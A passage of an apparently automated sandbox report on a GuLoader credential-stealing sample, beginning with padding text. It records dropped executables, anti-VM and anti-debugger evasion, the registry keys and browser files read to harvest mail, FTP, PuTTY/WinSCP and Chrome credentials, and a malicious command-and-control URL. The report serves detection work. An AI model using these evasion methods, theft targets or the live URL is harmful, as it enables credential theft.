ADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING vs lzJWJgZhPc.exe
PE file contains strange resources
Source: Form_Sporogeni.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lzJWJgZhPc.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe File read: C:\Users\user\Desktop\lzJWJgZhPc.exe Jump to behavior
Source: lzJWJgZhPc.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\lzJWJgZhPc.exe "C:\Users\user\Desktop\lzJWJgZhPc.exe"
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Process created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Process created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Jump to behavior
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_0040352D
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto Jump to behavior
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe File created: C:\Users\user\AppData\Local\Temp\nsbD32D.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/4@2/3
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_004021AA CoCreateInstance, 1_2_004021AA
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_0040498A
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: lzJWJgZhPc.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.411449067.00000000080A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.410653501.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A12E4 push es; retf 6_2_080A133D
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A12FC push es; retf 6_2_080A133D
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A3B17 push 77CDC3EFh; ret 6_2_080A3BA7
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A552B push edx; iretd 6_2_080A552C
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A2956 push ecx; retf 6_2_080A296F

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe File created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe File created: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy) Jump to dropped file
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process information set: NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Form_Sporogeni.exe, 00000006.00000002.411460088.00000000080C0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Form_Sporogeni.exe, 00000006.00000002.411460088.00000000080C0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe TID: 5964 Thread sleep count: 457 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe TID: 4828 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Last function: Thread delayed
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Window / User API: threadDelayed 457 Jump to behavior
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_00406873 FindFirstFileW,FindClose, 1_2_00406873
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405C49
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe API call chain: ExitProcess graph end node
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: Form_Sporogeni.exe, 00000006.00000002.411460088.00000000080C0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: Form_Sporogeni.exe, 0000000C.00000002.524923598.000000001E706000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: Form_Sporogeni.exe, 00000006.00000002.411460088.00000000080C0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Form_Sporogeni.exe, 00000006.00000002.411593970.0000000008AEA000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Form_Sporogeni.exe, 0000000C.00000002.521711966.00000000024EA000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Thread information set: HideFromDebugger Jump to behavior
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080ACC64 mov eax, dword ptr fs:[00000030h] 6_2_080ACC64
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080ABEB6 mov eax, dword ptr fs:[00000030h] 6_2_080ABEB6
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080A9349 mov eax, dword ptr fs:[00000030h] 6_2_080A9349
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Code function: 6_2_080AA615 LdrInitializeThunk,LoadLibraryA, 6_2_080AA615

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Process created: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_0040352D

Stealing of Sensitive Information:

barindex
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 532379 Sample: lzJWJgZhPc Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 28 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->28 30 Found malware configuration 2->30 32 Antivirus detection for URL or domain 2->32 34 5 other signatures 2->34 7 lzJWJgZhPc.exe 9 2->7         started        process3 file4 18 C:\Users\user\AppData\...\Form_Sporogeni.exe, PE32 7->18 dropped 10 Form_Sporogeni.exe 7->10         started        process5 signatures6 36 Machine Learning detection for dropped file 10->36 38 Tries to detect Any.run 10->38 40 Hides threads from debuggers 10->40 13 Form_Sporogeni.exe 60 10->13         started        process7 dnsIp8 22 63.250.34.171, 49761, 49762, 49773 NAMECHEAP-NETUS United States 13->22 24 googlehosted.l.googleusercontent.com 142.250.180.161, 443, 49760 GOOGLEUS United States 13->24 26 2 other IPs or domains 13->26 20 C:\Users\user\AppData\...\B52B3F.exe (copy), PE32 13->20 dropped 42 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->42 44 Tries to steal Mail credentials (via file / registry access) 13->44 46 Tries to harvest and steal ftp login credentials 13->46 48 3 other signatures 13->48 file9 signatures10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.180.161
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
63.250.34.171
 unknown United States
22612 NAMECHEAP-NETUS true
142.250.203.110
 drive.google.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
drive.google.com 142.250.203.110 true
googlehosted.l.googleusercontent.com 142.250.180.161 true
doc-00-50-docs.googleusercontent.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://63.250.34.171/tickets.php?id=277 true
  • Avira URL Cloud: malware
 unknown